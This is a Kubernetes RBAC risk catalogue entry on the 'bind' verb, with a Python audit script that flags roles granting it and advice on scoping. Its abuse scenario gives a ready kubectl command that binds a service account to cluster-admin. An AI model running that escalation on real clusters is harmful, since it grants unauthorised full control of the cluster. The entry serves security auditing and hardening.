Overview

| Field | Value |
|---|---|
| ID | 1032 |
| Name | Bind ClusterRoles to identities (bind verb) |
| Risk Category | Elevation of Privilege |
| Risk Level | Critical |
| Role Type | ClusterRole |
| API Groups | rbac.authorization.k8s.io |
| Resources | clusterroles |
| Risky Verb Combinations | [bind] |
| Tags | BindingToPrivilegedRole, ClusterAdminAccess, PrivilegeEscalation, RBACManipulation |

Description

Permits using the ‘bind’ verb on ClusterRoles (or Roles). This allows a user to create a ClusterRoleBinding (or RoleBinding) that grants the permissions of a specific role to another user, group, or service account, potentially leading to privilege escalation if a highly privileged role is bound.

Abuse Scenarios

  1. Create a ClusterRoleBinding to grant ‘cluster-admin’ to a service account, leveraging the ‘bind’ permission on the ‘cluster-admin’ ClusterRole.

```bash
# This command will succeed if the user has 'bind' on the 'cluster-admin' ClusterRole.
kubectl create -f - <<EOF
apiVersion: rbac.authorization.k8s.io/v1
kind: ClusterRoleBinding
metadata:
  name: bind-to-cluster-admin
subjects:
- kind: ServiceAccount
  name: <serviceaccount-name>
  namespace: <namespace>
roleRef:
  kind: ClusterRole
  name: cluster-admin
  apiGroup: rbac.authorization.k8s.io
EOF
# Example: kubectl create -f - <<EOF ... EOF (bind 'default' SA in 'default' namespace to cluster-admin)
```
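The defender-side counterpart to the scenario above is finding out which roles in a cluster actually hand out this permission before anyone uses it. The following audit script is an added example, not part of this catalogue entry or of any Kubernetes tooling. It walks the `rules` of a ClusterRole list in the shape `kubectl get clusterroles -o json` returns, flags every rule that grants `bind` (or `*`) on `clusterroles`/`roles` in the `rbac.authorization.k8s.io` (or `*`) API group, and rates it by scope: a rule without `resourceNames`, or one naming `cluster-admin`, can bind the most privileged role and is reported as critical; a rule scoped to other named roles is reported for review. The input document is constructed sample data, and the role names in it are invented.

```python
"""Audit ClusterRoles (or Roles) for rules that grant the 'bind' verb on RBAC roles.

Added example: not part of the catalogue entry. The sample input below is constructed
to look like `kubectl get clusterroles -o json`; the role names are invented.
"""
import json

RBAC_GROUP = "rbac.authorization.k8s.io"
ROLE_RESOURCES = {"clusterroles", "roles"}

# Constructed sample list (not real cluster data).
SAMPLE_CLUSTERROLES = json.loads("""
{
  "kind": "ClusterRoleList",
  "items": [
    {"kind": "ClusterRole", "metadata": {"name": "viewer"},
     "rules": [{"apiGroups": [""], "resources": ["pods"], "verbs": ["get", "list"]}]},
    {"kind": "ClusterRole", "metadata": {"name": "binder-unscoped"},
     "rules": [{"apiGroups": ["rbac.authorization.k8s.io"], "resources": ["clusterroles"],
                "verbs": ["bind"]}]},
    {"kind": "ClusterRole", "metadata": {"name": "binder-scoped"},
     "rules": [{"apiGroups": ["rbac.authorization.k8s.io"], "resources": ["clusterroles"],
                "verbs": ["bind"], "resourceNames": ["view"]}]},
    {"kind": "ClusterRole", "metadata": {"name": "wildcard-admin"},
     "rules": [{"apiGroups": ["*"], "resources": ["*"], "verbs": ["*"]}]}
  ]
}
""")


def rule_grants_bind(rule):
    """True if one PolicyRule lets its holder use 'bind' on ClusterRoles or Roles.

    Wildcards count: '*' in apiGroups, resources or verbs covers the RBAC group,
    the role resources and the bind verb respectively.
    """
    groups = set(rule.get("apiGroups", []))
    resources = set(rule.get("resources", []))
    verbs = set(rule.get("verbs", []))
    group_match = "*" in groups or RBAC_GROUP in groups
    resource_match = "*" in resources or bool(resources & ROLE_RESOURCES)
    verb_match = "*" in verbs or "bind" in verbs
    return group_match and resource_match and verb_match


def find_bind_grants(role_list):
    """Return (role name, severity, bindable role names) for every rule granting bind.

    Severity is 'critical' when the rule has no resourceNames (any role, including
    cluster-admin, can be bound) or explicitly names cluster-admin, else 'review'.
    """
    findings = []
    for role in role_list.get("items", []):
        name = role["metadata"]["name"]
        for rule in role.get("rules", []):
            if not rule_grants_bind(rule):
                continue
            names = rule.get("resourceNames") or ["*"]
            severity = "critical" if "*" in names or "cluster-admin" in names else "review"
            findings.append((name, severity, sorted(names)))
    return findings


if __name__ == "__main__":
    for role_name, severity, bindable in find_bind_grants(SAMPLE_CLUSTERROLES):
        print(f"{severity:8} {role_name}: can bind {', '.join(bindable)}")
```

To run it against a real cluster, replace `SAMPLE_CLUSTERROLES` with the parsed output of `kubectl get clusterroles -o json` (and `kubectl get roles -A -o json` for namespaced Roles). The severity split reflects how the API server's escalation check works: a subject may create a binding to a role only if it already holds every permission in that role, or holds `bind` on that specific role, so restricting `bind` rules with `resourceNames` to the roles a controller legitimately needs to hand out is the mitigation, and an unscoped `bind` on `clusterroles` is effectively a path to cluster-admin.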